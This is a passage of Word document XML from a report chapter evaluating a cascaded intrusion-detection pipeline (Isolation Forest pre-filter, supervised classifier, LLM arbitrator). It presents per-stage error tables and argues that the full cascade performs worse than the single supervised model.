            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1387 / 49 / 97 / 382</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The ordering is identical on both corpora and it is the worst possible one:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**every stage we add to the supervised model makes the system worse, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>full cascade is the weakest configuration of the four.** Removing stage 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>improves it. Removing stage 3 improves it. Removing both — which is to say,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>deleting the cascade and shipping the single model — improves it most.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The cascade's one apparent win is precision: 0.9083 against the hybrid's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.8755 on Dataset 1, with the false-alarm rate falling from 4.15% to 2.80%.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>That is a 33% relative reduction in analyst workload from false positives, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>it is the number a charitable write-up would lead with. The rest of this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>chapter is the argument for why it should not.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Attributing every error to the stage that caused it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Because the pipeline is a sequence of overrides on the supervised model's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>verdict, each stage's contribution to the confusion matrix can be isolated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>exactly. Relative to the hybrid running alone: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dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>false alarms removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>true detections destroyed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 1 — Isolation Forest clears</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 3 — arbitration on the band</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 1 — Isolation Forest clears</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stage 3 — arbitration on the band</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The precision gain is real and it is bought at an exchange rate of **1.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>missed attacks per false alarm avoided on Dataset 1, and 1.05 on Dataset 2.**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>For an intrusion-detection system that is the wrong side of one-for-one. A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>defender who genuinely valued analyst time at that rate would not need a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cascade to express the preference; the following two sections show they already</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>have a cheaper way to express it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 1: a filter that clears almost nothing and costs more than it saves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The first stage is an Isolation Forest whose clearing threshold is calibrated,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">not fixed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CascadeDetector.fit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sets it to the 1st percentile of the *training</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attacks'* anomaly scores (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/ensemble.py:52-60</w:t>
      </w:r>
      <w:r>
        <w:t>), so that 99% of known</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attacks by construction survive to stage 2. The calibrated values are 0.003333</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(D1) and 0.003245 (D2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Three measurements follow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>It clears 6.8% of Dataset 1 and 4.3% of Dataset 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 207 and 83 commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The generated results file already flags the mechanism behind this: a threshold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>set for recall cannot also be set for throughput, and this operating point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>deliberately buys the former. But the size of the resulting saving is worth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>stating plainly, because the analyst-fatigue argument is the entire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>justification for having an unsupervised first stage at all. A filter that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>removes one command in fifteen before the expensive model runs is not a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>meaningful reduction in compute, and it removes almost no analyst work either:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of the 207 commands it clears on Dataset 1, the hybrid would have raised an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>alert on five.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The recall guarantee does not quite survive contact with held-out data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Calibrated for 99% retention on the training attacks, stage 1 retains 98.82%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of Dataset 1's test attacks and 98.54% of Dataset 2's — it silently discards 9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and 7 real attacks respectively. The gap is small and in the expected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>direction, but it is the honest number: a threshold fitted on training attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>scores generalises to roughly 1.2–1.5% attack loss rather than the 1.0%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>budgeted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Its marginal effect on the confusion matrix is negative on both corpora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Of the 9 attacks it discards on Dataset 1, 5 would have been missed by stage 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>anyway; the marginal damage is 4 lost detections. Against that it removes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exactly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> false alarm the hybrid would have raised. Dataset 2 is the same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>story: 3 detections destroyed, 2 false alarms removed. This is the cascade's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>premise inverted — the pre-filter is supposed to absorb benign noise cheaply,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and instead it is a small net drain that happens to fall on the wrong class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.1 explains why this was foreseeable. On Dataset 1 the Isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Forest catches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacks the Random Forest misses — its false negatives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>are a strict superset — while its false positives are near-disjoint from the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>supervised models' (Jaccard 0.056). Its only useful signal in this project is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>benign</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> traffic, which is precisely the role stage 1 assigns it. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>finding here is that even in the one role its error structure suits, it is too</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>weak to pay for itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 3: an arbitrator that never fires, and a threshold shift wearing a costume</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Stage 3 routes commands whose stage-2 probability falls in [0.35, 0.65] to an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>arbitrator. The live arbitrator is a Llama-3.1-8B call (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>huggingface_arbitrator</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the figures above use the deterministic offline stub that lets the harness run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>without a token (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/llm_triage.py:75-93</w:t>
      </w:r>
      <w:r>
        <w:t>), which labels a command malicious</w:t>
      </w:r>
